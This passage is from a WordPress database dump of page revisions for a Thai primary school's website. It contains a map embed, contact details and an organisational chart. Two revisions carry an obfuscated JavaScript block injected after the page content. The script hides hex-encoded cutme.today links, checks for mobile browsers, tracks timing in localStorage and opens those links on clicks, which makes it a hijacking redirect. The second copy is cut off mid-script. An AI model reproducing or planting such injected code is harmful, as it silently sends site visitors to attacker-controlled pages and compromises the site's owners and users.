aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-06 13:16:34','2024-08-06 06:16:34','',14,'http://pakhaeng.ssk.in.th/?p=545',0,'revision','',0),
(546,1,'2024-08-06 13:17:10','2024-08-06 06:17:10','<!-- wp:image {\"id\":1280,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/โครงสร้าง-1-1024x256.png\" alt=\"\" class=\"wp-image-1280\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:file {\"id\":1284,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/โครงสร้างและอำนาจหน้าที่.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/โครงสร้างและอำนาจหน้าที่.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"โครงสร้างและอำนาจหน้าที่\"></object><a id=\"wp-block-file--media-18759cf2-e68c-45aa-8b1a-07e5eddca924\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/โครงสร้างและอำนาจหน้าที่.pdf\">โครงสร้างและอำนาจหน้าที่</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/โครงสร้างและอำนาจหน้าที่.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-18759cf2-e68c-45aa-8b1a-07e5eddca924\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":1602,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/Green-Clean-Corporate-Organizational-Chart-1.png\" alt=\"\" class=\"wp-image-1602\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const 